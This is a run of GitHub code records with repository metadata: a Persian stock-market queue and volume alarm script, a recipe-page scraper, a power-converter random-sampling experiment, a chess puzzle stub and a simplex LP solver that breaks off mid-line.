[tmax, 'بشترین قیمت مجاز'],\n [last_price, 'اخرین قیمت']]\n )\n if a3 > m * 50 / 100 and last_price == tmax:\n BuyQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")} {str(a1) + \" صف جدید\": >20}{str(a) + \" صف قدیم\" : >20} {\"[\" + data + \"]\":>10}')\n except:\n pass\n\n # 0-1-آلارم صف فروش نزدیک به ریختن\n def _sale_queue(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n a = int(old_symbols[symbol]['vol_qu_sell'].replace(',', '')) # حجم اولین صف فروش\n a1 = int(new_symbols[symbol]['vol_qu_sell'].replace(',', '')) # حجم اولین صف فروش بعد ده ثانیه\n a3 = a - a1 # اختلاف حجم صف فروش در ده ثانیه\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n last_price = 
int(new_symbols[symbol]['lastPrice'].replace(',', ''))\n tmin = int(new_symbols[symbol]['tmin'].replace(',', ''))\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n\n # # test3\n # SaleQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), m).add()\n list = []\n list.append([\n [a, 'حجم فروش قدیم'], [a1, 'حجم فروش جدید'], [m, 'حجم مبنا'], [tmin, 'کمترین قیمت مجاز'],\n [last_price, 'اخرین قیمت']]\n )\n if a3 > m * 20 / 100 and last_price == tmin:\n SaleQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f' {time.strftime(\"%H:%M:%S\")}{str(a1) + \" صف جدید\": >20}{str(a) + \" صف قدیم\" : >20} {\"[\" + data + \"]\":>10}')\n\n except:\n pass\n\n # 3- آلارم خرید و فروش گروهی\n def _group_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n se1 = int(old_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n\n nbu1 = int(old_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n nse1 = int(old_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معلاملات فروش حقیقی\n # بعد ده ثانیه\n bu2 = int(new_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n se2 = int(new_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n\n nbu2 = int(new_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n nse2 = int(new_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معلاملات فروش حقیقی\n\n bu3 = max(0, bu1 - bu2)\n se3 = max(0, se1 - se2)\n\n nbu3 = max(0, nbu1 - nbu2)\n nse3 = max(0, nse1 - nse2)\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] # قیمت اخرین معامله\n link = new_symbols[symbol]['link']\n data = new_symbols[symbol]['symbol']\n price_and_percentage = f\"{lastPrice} ({lastPercent})\" # قیمت معامله و درصد\n # # test3\n # GroupBuySale(data, \"خرید\", nbu2, 1111, bu3, 1111, link, time.strftime(\n # \"%H:%M:%S\"), m).add()\n\n list = []\n list.append([\n [bu1, 'حجم خرید حقیقی قدیم'], [bu2, 'حجم خرید حقیقی جدید'], [m, 'حجم مبنا'],\n [se1, 'حجم فروش حقیقی قدیم'], [se2, 'حجم فروش حقیقی جدید'],\n [nbu1, 'تعداد خرید حقیقی قدیم'], [nbu2, 'تعداد خرید حقیقی جدید'],\n [nse1, 'تعداد فروش حقیقی قدیم'], [nse2, 'تعداد فروش حقیقی جدید'],\n ])\n try:\n each_haghighi_buy = bu3 / nbu2 * int(lastPrice.replace(',', '')) # هر کد حقیقی\n each_haghighi_sel = se3 / nse2 * int(lastPrice.replace(',', '')) # هر کد حقیقی\n if float(bu3 / nbu3) > m * 1 / 100:\n GroupBuySale(data, \"خرید\", nbu2, each_haghighi_buy, bu3, price_and_percentage, link,\n time.strftime(\n \"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\") + \"زمان\"}{str(bu3 / nbu3) + \" میزان خرید هر خریدار\": >20} {str(nbu3) + \"تعداد خریدار\": >20}{str(bu3) + \" میزان خرید\" : >20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n try:\n if float(se3 / nse3) > m * 1 / 100:\n GroupBuySale(data, \"فروش\", nse2, each_haghighi_sel, se3, price_and_percentage, link,\n time.strftime(\n \"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\") + \"زمان\"}{str(se3 / nse3) + \" میزان فروش هر فروشنده\": >20} {str(nse3) + \" تعداد فروشنده\": >20}{str(se3) + \" میزان فروش\" : >20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n except:\n pass\n\n # 2- آلارم 
تغییر سرانه قدرت خریدار و فروشنده\n def _capita_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n nbu1 = int(old_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n se1 = int(old_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n nse1 = int(old_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معاملات فروش حقیقی\n\n bu2 = int(new_symbols[symbol]['haghighiBuy'].replace(',', '')) # حجم خرید حقیقی\n nbu2 = int(new_symbols[symbol]['haghighiBuyNum'].replace(',', '')) # تعداد معاملات خرید حقیقی\n se2 = int(new_symbols[symbol]['haghighiSellVol'].replace(',', '')) # حجم فروش حقیقی\n nse2 = int(new_symbols[symbol]['haghighiSellNum'].replace(',', '')) # تعداد معاملات فروش حقیقی\n\n data = new_symbols[symbol]['symbol']\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] # قیمت اخرین معامله\n link = new_symbols[symbol]['link']\n # # test3\n # CapitaBuySale(data, \"خرید\", 111, 1111, 111, 111,\n # 111, f\"{lastPrice} ({lastPercent})\", link,\n # time.strftime(\"%H:%M:%S\")).add()\n list = []\n list.append([\n [bu1, 'حجم خرید حقیقی قدیم'], [bu2, 'حجم خرید حقیقی جدید'],\n [se1, 'حجم فروش حقیقی قدیم'], [se2, 'حجم فروش حقیقی جدید'],\n [nbu1, 'تعداد خرید حقیقی قدیم'], [nbu2, 'تعداد خرید حقیقی جدید'],\n [nse1, 'تعداد فروش حقیقی قدیم'], [nse2, 'تعداد فروش حقیقی جدید'],\n ])\n # percentage_change_buy_sale = ((bu2 / nbu2) / (se2 / nse2))\n percentage_change_buy_sale = 0\n if ((bu2 / nbu2) / (se2 / nse2)) > 2 * ((bu1 / nbu1) / (se1 / nse1)):\n CapitaBuySale(data, \"خرید\", round(bu1 / nbu1, 2), round(se1 / nse1, 2), round(bu2 / nbu2, 2),\n round(se2 / nse2, 2),\n round(percentage_change_buy_sale, 2), f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")}{str(round(se1 / nse1)) + \" سرانه فروش قدیم\":>20}{str(round(bu1 / nbu1)) + \" سرانه خرید قدیم\":>20}{str(round(se2 / nse2)) + \" سرانه فروش جدید\":>20}{str(round(bu2 / nbu2)) + \" سرانه خرید جدید\" : >20}{\" سرانه خریدار : وضعیت \":>20}{\"[\" + data + \"]\":>10}')\n\n if ((se2 / nse2) / (bu2 / nbu2)) > 2 * ((se1 / nse1) / (bu1 / nbu1)):\n CapitaBuySale(data, \"فروش\", round(bu1 / nbu1, 2), round(se1 / nse1, 2), round(bu2 / nbu2, 2),\n round(se2 / nse2, 2),\n round(percentage_change_buy_sale, 2), f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\")}{str(round(se1 / nse1)) + \" سرانه فروش قدیم\":>20}{str(round(bu1 / nbu1)) + \" سرانه خرید قدیم\":>20}{str(round(se2 / nse2)) + \" سرانه فروش جدید\":>20}{str(round(bu2 / nbu2)) + \" سرانه خرید جدید\" : >20}{\"سرانه فروشند : وضعیت\":>20}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n # 4- آلارم خرید و فروش سنگین حقوقی\n def _hoghoghi_buy_sale(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n bu1 = int(old_symbols[symbol]['hoghighiBuyVol'].replace(',', '')) # حجم خرید حقوقی\n se1 = int(old_symbols[symbol]['hoghoghiSellVol'].replace(',', '')) # حجم فروش حقوقی\n\n bu2 = int(new_symbols[symbol]['hoghighiBuyVol'].replace(',', '')) # حجم خرید حقوقی\n se2 = int(new_symbols[symbol]['hoghoghiSellVol'].replace(',', '')) # حجم فروش حقوقی\n\n se3 = se1 - se2\n bu3 = bu1 - bu2\n\n lastPrice = new_symbols[symbol]['lastPrice'] # قیمت اخرین معامله\n lastPercent = new_symbols[symbol]['lastPercent'] 
# قیمت اخرین معامله\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا # حجم مبنا\n list = []\n list.append([\n [bu1, ' حجم خرید حقوقی قدیم'], [bu2, ' حجم خرید حقوقی جدید'], [m, \"ججم مبنا\"],\n [se1, 'حجم فروش حقوقی قدیم'], [se2, 'حجم فروش حقوقی جدید'],\n\n ])\n if bu3 > (m * 1 / 10):\n HoghoghiBuySale(data, \"خرید\", bu3, f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n\n print(\n Fore.GREEN + f'{time.strftime(\"%H:%M:%S\")} {str(bu3) + \" حجم خرید حقوقی\":>10}{\"[\" + data + \"]\":>10}')\n\n if se3 > (m * 1 / 10): # (m * 1 / 10)\n HoghoghiBuySale(data, \"فروش\", se3, f\"{lastPrice} ({lastPercent})\", link,\n time.strftime(\"%H:%M:%S\"), str(list[0])).add()\n print(\n Fore.RED + f'{time.strftime(\"%H:%M:%S\")} {str(se3) + \" حجم فروش حقوقی\":>10}{\"[\" + data + \"]\":>10}')\n except:\n pass\n\n def _clean_table(self):\n session.query(SaleQueue).delete()\n session.query(BuyQueue).delete()\n session.query(CapitaBuySale).delete()\n session.query(HoghoghiBuySale).delete()\n session.query(GroupBuySale).delete()\n session.commit()\n\n def main(self):\n time_queue = 0\n i = 0\n t_e = 12 * 3600 + 30 * 60\n t_s = 9 * 3600\n t_n = time.localtime().tm_hour * 3600 + time.localtime().tm_min * 60 + time.localtime().tm_sec\n while t_s < t_n and t_e > t_n:\n all = time.time()\n div1 = self.driver.execute_script(self.script1)\n sc = time.time() - all\n new_symbols = div1\n if i == 0:\n old_symbols = new_symbols\n old_symbols_q = new_symbols\n pro = time.time()\n\n try:\n print(Fore.WHITE + \"-------------group_buy_sale--------------------\")\n self._group_buy_sale(new_symbols, old_symbols)\n print(Fore.WHITE + \"-------------capita_buy_sale--------------------\")\n self._capita_buy_sale(new_symbols, old_symbols)\n print(Fore.WHITE + \"-------------hoghoghi_buy_sale--------------------\")\n self._hoghoghi_buy_sale(new_symbols, old_symbols)\n if time_queue == 10:\n print(Fore.WHITE + \"-------------sale_queue--------------------\")\n self._sale_queue(new_symbols, old_symbols_q)\n print(Fore.WHITE + \"-------------buy_queue--------------------\")\n self._buy_queue(new_symbols, old_symbols_q)\n time_queue = 0\n old_symbols_q = new_symbols\n\n except Exception as e:\n print(Fore.RED + f\"----------error-{e}--------------\")\n\n\n session.commit()\n tpro = time.time() - pro\n time.sleep(max(0, 1 - (time.time() - all)))\n time_queue += 1\n t_n = time.localtime().tm_hour * 3600 + time.localtime().tm_min * 60 + time.localtime().tm_sec\n i += 1\n old_symbols = new_symbols\n print(Fore.CYAN + f\"== all {time.time() - all} ==sc {sc} ==pro {tpro}========\")\n\n print(\"Close market !\")\n # claen database\n if 0 < t_n and 180 > t_n:\n self._clean_table()\n print(\"Clean to database...\")\n\n\n def run(self):\n def min():\n while True:\n self.main()\n time.sleep(60)\n\n Thread(target=min, args=()).start()\n\n\n# a = AlarmBorce()\n# a.run()\n","repo_name":"navaiy/robo","sub_path":"seleniu.py","file_name":"seleniu.py","file_ext":"py","file_size_in_byte":23115,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3220292264","text":"import sys\nsys.stdin = open('BOJ#1799_Bishop.txt')\n\ndcol = [-1, 1, 1, -1]\ndrow = [1, 1, -1, -1]\n\n\nN = int(input())\nchess = [list(map(int, input().split())) for _ in range(N)]\nfor col in range(N):\n for row in range(N):\n if chess[col][row] == 1:\n dfs(col, 
row)","repo_name":"gmkim716/Study","sub_path":"Solving/BOJ#1799_Bishop.py","file_name":"BOJ#1799_Bishop.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7535598342","text":"from bs4 import BeautifulSoup\n\nimport requests\n\n# strip function\n\n\ndef stripdata(data):\n    data = data.string\n    data = data.strip()\n    return data\n\n\nRecipeUrl = 'https://www.allrecipes.com/recipe/269096/naturally-sweetened-cranberry-sauce/'\n\n\nallrecipes = requests.get(RecipeUrl)\n\nsoup = BeautifulSoup(allrecipes.text, 'lxml')\n\ntittle = soup.h1.string\n\nURL = RecipeUrl\n\n# Time\n\nTimePrep = soup.find_all(class_=\"recipe-meta-item-body\")[0]\nTimeCook = soup.find_all(class_=\"recipe-meta-item-body\")[1]\nTimeTotal = soup.find_all(class_=\"recipe-meta-item-body\")[2]\n\n\nTimePrep = stripdata(TimePrep)\nTimeCook = stripdata(TimeCook)\nTimeTotal = stripdata(TimeTotal)\n\n# Servings and Amount per recipe\n\nServings = soup.find_all(class_=\"recipe-meta-item-body\")[3]\n\nServings = stripdata(Servings)\n\ningredient1 = soup.find_all(class_=\"ingredients-item-name\")[0]\nlenght = soup.find_all(class_=\"ingredients-item-name\")\n\n\ningredient1 = stripdata(ingredient1)\n# Ingredients\n\ni = 0\nfor i in lenght:\n    stripdata(i)\n    print(stripdata(i))\n\n\nprint(URL)\nprint()\nprint(tittle)\nprint()\nprint(TimePrep)\nprint()\nprint(TimeCook)\nprint()\nprint(TimeTotal)\nprint()\nprint(Servings)\nprint()\nprint(ingredient1)\n\n\n# URL -DONE\n# Tittle\n# Recipe details (prep,time, etc)\n# ---Prep\n# ---Cook\n# ---Total\n# ---Servings\n# ---Yield\n# INGREDIENTS (get lenght and after each other separated) check if is vegan or vegetarian\n# Directions (get lenght and after each other separated)\n","repo_name":"BhomBogdan/MasterRecipesAPI","sub_path":"TESTBeautiful.py","file_name":"TESTBeautiful.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28821966637","text":"import _thread\nimport threading\nimport multiprocessing\nimport os\nimport time\nimport sys\nimport math\nimport random\nfrom ucts import uct\nfrom ucts import TopoPlanner\nfrom ucts.GetReward import *\nimport datetime\n\nimport numpy as np\nfrom utils.util import mkdir, get_sim_configs, save_reward_hash, get_steps_traj, read_approve_path, \\\n    read_joint_component_prob\nfrom SimulatorAnalysis import UCT_data_collection\n\nimport gc\nimport datetime\nfrom SimulatorAnalysis.UCT_data_collection import *\n\n\ndef data_dict_to_list(data_json_file):\n    data_list = []\n    for k, v in data_json_file.items():\n        data_list.append([k, v])\n    return data_list\n\n\ndef random_sampling(traj, test_number, configs, date_str, target_vout_min=-500, target_vout_max=500):\n    path = './SimulatorAnalysis/database/analytic-expression.json'\n    out_file_name = \"Results/mutitest_\" + str(configs['target_vout']) + \"-\" + date_str + \"-\" + str(os.getpid()) + \".txt\"\n    figure_folder = \"figures/\" + date_str + \"/\"\n    mkdir(figure_folder)\n\n    start_time = datetime.datetime.now()\n    good_result_num = 0\n    fo = open(out_file_name, \"w\")\n    fo.write(\"max_depth,num_runs,avg_step\\n\")\n    avg_step_list = []\n    results = []\n    keys = []\n    data_json_file = json.load(open(\"./SimulatorAnalysis/database/data.json\"))\n    # for k, v in data_json_file.items():\n    #     if v['key'] not in keys:\n    #         print(v['key'])\n    #         keys.append(v['key'])\n    # print('number of keys:', len(keys))\n    data_list = 
data_dict_to_list(data_json_file)\n # for i in data_list:\n # print(i)\n # print(len(data_list))\n # return\n expression_json_file = json.load(open(\"./SimulatorAnalysis/database/expression.json\"))\n print('number of expression:', len(expression_json_file))\n print('number of data:', len(data_list))\n key_json_file = json.load(open(\"./SimulatorAnalysis/database/key.json\"))\n print(len(key_json_file))\n # return\n simu_results = []\n with open(\"./SimulatorAnalysis/database/analytic.csv\", \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n simu_results.append(row)\n\n for _ in range(test_number):\n query_number = 0\n hash_number = 0\n max_reward = -1\n max_result = None\n key_expression = {}\n searched_data = {}\n total_data_len = len(data_list)\n print(total_data_len)\n while query_number < traj:\n # for i in range(0, len(data_list)):\n sample_data = random.choice(data_list)\n # sample_data = data_list[i]\n data_fn = sample_data[0]\n str_list_of_node = str(sample_data[1]['list_of_node'])\n str_list_of_edge = str(sample_data[1]['list_of_edge'])\n str_net_list = str(sample_data[1]['netlist'])\n data_graph = (str_list_of_node, str_list_of_edge, str_net_list)\n if data_graph in searched_data:\n hash_number += 1\n continue\n query_number += 1\n searched_data[data_graph] = query_number\n\n if sample_data[0] not in expression_json_file:\n expression = \"Invalid\"\n duty_cycle_para = \"None\"\n reward = 0\n tmp_para = duty_cycle_para\n tmp_result = {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n if data_json_file[data_fn]['key'] + '$' + duty_cycle_para not in key_expression:\n key_expression[data_json_file[data_fn]['key'] + '$' + duty_cycle_para] = \\\n {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n else:\n expression = expression_json_file[data_fn]\n for i in range(len(simu_results)):\n if simu_results[i][0] == data_fn:\n print(simu_results[i])\n reward = -1\n while i < (len(simu_results)) and simu_results[i][0] == data_fn:\n duty_cycle_para = float(simu_results[i][1])\n if data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para) not in key_expression:\n if simu_results[i][3] != 'False' and simu_results[i][4] != 'False':\n key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)] = \\\n {'Expression': expression, 'efficiency': float(simu_results[i][4]) / 100,\n 'output_voltage': float(simu_results[i][3])}\n else:\n key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)] = \\\n {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n\n effis = key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)]\n tmp_reward = calculate_reward(effis, configs[\"target_vout\"])\n\n if tmp_reward > reward:\n reward = tmp_reward\n tmp_result = key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)]\n tmp_para = str(duty_cycle_para)\n i += 1\n break\n else:\n continue\n if tmp_para == '0.5' and tmp_result['efficiency'] > 0.9 and tmp_result['output_voltage'] > 47:\n good_result_num += 1\n print('good_result_num', good_result_num)\n time.sleep(0.5)\n if reward > max_reward:\n max_reward = reward\n result = tmp_result\n para = tmp_para\n print(good_result_num)\n\n # return\n\n # topologies = [sim.get_state()]\n effis = [{'efficiency': result['efficiency'], 'output_voltage': result['output_voltage']}]\n print(\"effis of topo:\", effis, \" para:\", para)\n fo.write(\"efficiency:\" + str(effis) + \"\\n\")\n 
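# record the best reward seen in this run and how many unique topologies were queried\n    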
fo.write(\"final reward:\" + str(max_reward) + \"\\n\")\n fo.write(\"query time:\" + str(query_number) + \"\\n\")\n # sim.get_state().visualize(\n # \"result with parameter:\" + str(str(final_para_str)) + \" \", figure_folder)\n end_time = datetime.datetime.now()\n fo.write(\"end at:\" + str(end_time) + \"\\n\")\n fo.write(\"start at:\" + str(start_time) + \"\\n\")\n fo.write(\"execute time:\" + str((end_time - start_time).seconds) + \" seconds\\n\")\n fo.write(\"result with parameter:\" + str(str(para)) + \"\\n\")\n fo.write(\"----------------------------------------------------------------------\" + \"\\n\")\n fo.write(\"configs:\" + str(configs) + \"\\n\")\n\n result = \"Traj: \" + str(traj)\n print(effis, \", \", para)\n if para == '0.5' and effis[0]['efficiency'] > 0.9 and effis[0]['output_voltage'] > 47:\n good_result_num += 1\n result = result + \"#efficiency:\" + str(effis[0]['efficiency']) + \"#vout:\" + str(effis[0]['output_voltage']) \\\n + \"#para:\" + str(para) + \"#FinalRewards:\" + str(\n max_reward) + \"#ExecuteTime:\" + str((end_time - start_time).seconds) + \"#QueryTime:\" + str(\n query_number)\n results.append(result)\n del key_expression\n gc.collect()\n\n print(\"figures are saved in:\" + str(figure_folder) + \"\\n\")\n print(\"outputs are saved in:\" + out_file_name + \"\\n\")\n for result in results:\n fo.write(result + \"\\n\")\n\n fo.write('good prob:' + str(good_result_num / len(traj_list)) + \"\\n\")\n print(good_result_num / len(traj_list))\n fo.close()\n\n # save_reward_hash(sim)\n del result\n gc.collect()\n return\n\n\ndef read_result(file_name):\n # Traj: 2000#efficiency:0.98#vout:49.0#para:0.5#FinalRewards:0.9023840000000001#ExecuteTime:3321#QueryTime:2000\n file_name = 'Results/'+file_name\n fo_conf = open(file_name, \"r\")\n line = fo_conf.readline()\n good_count = 0\n total_count = 0\n effis = []\n while True:\n line = fo_conf.readline()\n # print(line)\n if not line:\n break\n if 'Traj: ' in line:\n print(line)\n total_count+=1\n if total_count>100:\n break\n items = line.split('#')\n for item in items:\n if 'efficiency' in item:\n effi = float(item.split(':')[1])\n elif 'para' in item:\n para = float(item.split(':')[1])\n elif 'vout' in item:\n vout = float(item.split(':')[1])\n elif 'Traj' in item:\n traj = float(item.split(':')[1])\n if effi >= 0.9 and 45.0 < vout < 55:\n\n good_count += 1\n if effi>40:\n effi = 0.98\n if effi >= 0.9 and (vout < 40.0 or vout > 60):\n effi = 0.01\n effis.append(effi)\n print(effis)\n print(len(effis))\n print(\"avg:\", np.mean(effis))\n print(\"std error:\", np.var(effis)/math.sqrt(total_count))\n print(good_count / 100)\n\n\n","repo_name":"fanshaoze/RL-AL-for-Power-Converter-Design","sub_path":"UCT_5_UCB_unblc_restruct_DP_v1/Algorithms/RandomSampling.py","file_name":"RandomSampling.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"16057881490","text":"import numpy as np\nfrom numpy.linalg import inv\n\nclass Simplex:\n\n def __init__(self, A, b,c, rule: int = 0):\n self.coefMatrix = A\n self.valueMatrix = b\n self.costMatrix = c\n self.rule = rule\n\n def copatibilityCheck(self, rowCount, colCount):\n if colCount < rowCount:\n return False , \"System Incompatibility ------ (no. 
of variables : {} LESS THAN {} : no. of constraints\".format(colCount, rowCount)\n        if self.valueMatrix.shape != (rowCount,):\n            return False, \"System Incompatibility ------ Value matrix b has shape {}, expected {}.\".format(self.valueMatrix.shape, (rowCount,))\n        if self.costMatrix.shape != (colCount,):\n            return False, \"System Incompatibility ------ Cost Matrix has shape {}, expected {}.\".format(self.costMatrix.shape, (colCount,))\n        return True, \"Success\"\n\n    def simplexBase(self):\n        rowCount, colCount = self.coefMatrix.shape[0], self.coefMatrix.shape[1]\n\n        error, msg = self.copatibilityCheck(rowCount, colCount)\n        if not error:\n            return msg\n\n        bfs1 = [0]*(colCount - rowCount) + [1 for i in range((rowCount))]\n        bfs1 = np.array(bfs1)\n        basic_init = set(range(colCount-rowCount,colCount))\n\n        msg, x, basic, ofv, bfs, count = self.simplexPhaseII(bfs1, basic_init)\n\n        if msg == 0:\n            print(\"\\n\\n\" +\n                  \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SOLUTION to the LP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\" +\n                  \"\\n\\n\" +\n                  \"Found optimal solution at x = {}. \\n\".format(x) +\n                  \"Basic variables: {}\\n\".format(basic) +\n                  \"Nonbasic variables: {}\\n\".format(set(range(colCount)) - basic) +\n                  \"Optimal value function: {}.\".format(ofv))\n        elif msg == 1:\n\n            print (\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\" +\n                   \"\\n\\n\" +\n                   \"LP is UNBOUNDED\")\n\n        return msg, x, ofv, bfs\n\n    def unBoundedCheck(self, rccv_q, N, B_inv):\n        for item, i in zip(rccv_q, N):\n            if item[0] > 0:\n                a = B_inv * self.coefMatrix[:, item[1]]\n                return all(i <= 0 for i in a)\n        return False\n\n    def blandsRule(self,prices, N):\n\n        rccv =[((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N]\n        posRccv = [item[1] for item in rccv if item[0] > 0]\n        minSub = min(posRccv) if posRccv else 0\n        corRccv = 0\n        for i,j in rccv:\n            if minSub == j:\n                corRccv = i\n        rcc = [(self.costMatrix[q] - prices * self.coefMatrix[:, q]).item() for q in N]\n\n        return all(i <= 0 for i in rcc), corRccv, minSub\n\n    def maxCoefRule(self, prices, N):\n        rccv, q = max([((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N],\n                      key=(lambda item: item[0]))\n        rcc = [(self.costMatrix[q] - prices * self.coefMatrix[:, q]).item() for q in N]\n\n        return all(i <=0 for i in rcc), rccv, q\n\n    def simplexPhaseII(self, x: np.array, basic: set, ):\n\n        rowCount, colCount = self.coefMatrix.shape[0], self.coefMatrix.shape[1]\n        B, N = list(basic), set(range(colCount)) - basic\n        B_inv = inv(self.coefMatrix[:, B])\n\n        ofv = np.dot(self.costMatrix, x)\n        del basic\n\n        count = 1\n        while count < 50:\n            rccv, basicwitch, nonBasicSwitch, delta, mipr = None, None, None, None, None\n\n            prices = self.costMatrix[B] * B_inv\n            rccv_q = [((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N]\n\n            print (\"------------------------------------------------------------------------\")\n            print (\"---------------------- Iteration - {} ----------------------------------\".format(count))\n            print (\"Next Basic variables: {}\\n\".format(B) +\n                   \"Next Nonbasic variables: {}\\n\".format(N) +\n                   \"Objective value function: {}\\n\".format(ofv) +\n                   \"RCCV : {}\".format(rccv_q) )\n\n            print (\"------------------------------------------------------------------------\")\n\n            count += 1\n\n            unbounded = self.unBoundedCheck(rccv_q, N, B_inv)\n            if unbounded:\n                return 1, x, set(B), None, mipr, count\n\n            if self.rule == 0:\n                \"\"\"Blands AntiCycling Rule\"\"\"\n                optimum, rccv, basicwitch = self.blandsRule(prices, N)\n\n            elif self.rule == 1:\n                \"\"\"Maximum Coefficient Rule\"\"\"\n                
optimum, rccv, basicwitch = self.maxCoefRule(prices,N)\n\n else:\n \"\"\"No Valid Rule\"\"\"\n raise ValueError (\"Please input a valid Pivot Rule\")\n\n if optimum:\n \"\"\"Optimum Value Found\"\"\"\n ofv = np.dot(prices, self.valueMatrix)\n if all(i for i in x >=0):\n return 0, x, set(B), ofv, None, count\n\n \"\"\"Build the next BFS\"\"\"\n bfsbuild = np.zeros(colCount)\n for i in range(rowCount):\n bfsbuild[B[i]] = (-B_inv[i, :] * self.coefMatrix[:, basicwitch]).item()\n\n bfsbuild[basicwitch] = 1\n\n mipr = [(-x[B[i]] / bfsbuild[B[i]], i) for i in range(rowCount) if bfsbuild[B[i]] < 0]\n\n if len(mipr) == 0:\n print(\"Unbounded Problem has been identified\")\n return 1, x, set(B), None, bfsbuild, count\n\n delta, nonBasicSwitch = max(mipr, key=(lambda item: item[0]))\n\n \"\"\"Update the variables\"\"\"\n x = np.array([var for var in (x + delta * bfsbuild)])\n\n \"\"\"Update Objective fucntion value\"\"\"\n ofv = (ofv + delta * rccv)\n\n for i in set(range(rowCount)) - {nonBasicSwitch}:\n B_inv[i, :] -= bfsbuild[B[i]]/bfsbuild[B[nonBasicSwitch]] * B_inv[nonBasicSwitch, :]\n\n B_inv[nonBasicSwitch, :] /= -bfsbuild[B[nonBasicSwitch]]\n\n \"\"\"Non Basic Variable update\"\"\"\n N = N - {basicwitch} | {B[nonBasicSwitch]}\n\n \"\"\"Basic Variable update\"\"\"\n B[nonBasicSwitch] = basicwitch\n\n raise TimeoutError(\"LP is running into Infinite Loop\")\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Rule 0 - Bland's Anti Cyclic Rule\n Rule 1 - Maximum Coefficient Pivot rule \n \"\"\"\n rule = 0\n\n \"\"\"\n Example 1\n \"\"\"\n A = np.matrix([[0.5, -5.5,-2.5,9,1,0,0], [0.5, -1.5, -0.5,1, 0,1,0],[1,0,0,0,0,0,1]])\n b = np.array([0,0,1])\n c = np.array([10, -57,-9,-24, 0,0,0])\n\n \"\"\"\n Example 2\n \"\"\"\n A = np.matrix([[1,0,0,1,0,0], [0,1,0,0,1,0],[0,0,1,0,0,1]])\n b = np.array([2,1,6])\n c = np.array([2,3,1,0,0,0])\n\n\n \"\"\"\n Example 3\n \"\"\"\n # A = np.matrix([[200,80,40,1], [1,1,1,0]])\n # b = np.array([10000,50])\n # c = np.array([60,20,30,0])\n obj = 